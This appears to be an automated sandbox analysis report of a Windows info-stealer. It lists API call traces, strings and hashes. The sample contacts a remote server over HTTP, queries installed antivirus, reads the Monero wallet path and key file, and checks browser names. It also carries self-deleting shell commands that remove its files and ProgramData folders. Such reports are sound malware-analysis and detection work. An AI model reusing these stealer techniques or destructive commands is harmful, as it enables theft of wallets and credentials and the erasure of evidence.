                                                                                                                    • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                    • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                    • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                    • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                    • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                    • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                    • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                    • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                    • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                    • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                    • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                    • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                    • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                  • String ID: .exe$.exe$2ee1445fc63bc20d0e7966867b13e0e1$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                  • API String ID: 305159127-2219833542
                                                                                                                  • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                  • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                  • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                  • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                  APIs
                                                                                                                  • strtok_s.MSVCRT ref: 004135EA
                                                                                                                  • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                  • strtok_s.MSVCRT ref: 0041398F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                  • String ID: false$true
                                                                                                                  • API String ID: 2116072422-2658103896
                                                                                                                  • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                  • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                  • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                  • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                  • String ID: GET$\xA
                                                                                                                  • API String ID: 442264750-571280152
                                                                                                                  • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                  • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                  • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                  • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                  • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                    • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                    • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                  • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                  • API String ID: 4288110179-315474579
                                                                                                                  • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                  • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                  • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                  • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004012A7
                                                                                                                  • _memset.LIBCMT ref: 004012B6
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                  • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                  • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                    • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                    • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                    • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                  • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2891980384-0
                                                                                                                  • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                  • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                  • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                  • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                  • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                  • wsprintfA.USER32 ref: 004112DD
                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                  • String ID: - $%s\%s$?
                                                                                                                  • API String ID: 2394436309-3278919252
                                                                                                                  • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                  • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                  • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                  • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00418296
                                                                                                                  • _memset.LIBCMT ref: 004182A5
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                                  • _memset.LIBCMT ref: 00418465
                                                                                                                  • _memset.LIBCMT ref: 00418477
                                                                                                                  • ExitProcess.KERNEL32 ref: 00418487
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  Strings
                                                                                                                  • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                                  • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                                  • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                                  • " & exit, xrefs: 00418389
                                                                                                                  • " & exit, xrefs: 004183DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                  • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                  • API String ID: 2823247455-1079830800
                                                                                                                  • Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                  • Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
                                                                                                                  • Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                  • Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58
                                                                                                                  APIs
                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                  • wsprintfA.USER32 ref: 00410AA7
                                                                                                                  • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                    • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                    • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                    • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                    • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                  • String ID: wA$:\$C$QuBi
                                                                                                                  • API String ID: 1856320939-1441494722
                                                                                                                  • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                  • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                  • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                  • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                    • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                    • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                    • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                    • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                    • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                    • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                  • API String ID: 4174444224-1526165396
                                                                                                                  • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                  • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                  • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                  • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                  APIs
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                  • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy
                                                                                                                  • String ID: Stable\$ Stable\$firefox
                                                                                                                  • API String ID: 3722407311-2697854757
                                                                                                                  • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                  • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                  • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                  • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00401ADC
                                                                                                                    • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                    • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                    • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                    • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                    • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00401C9D
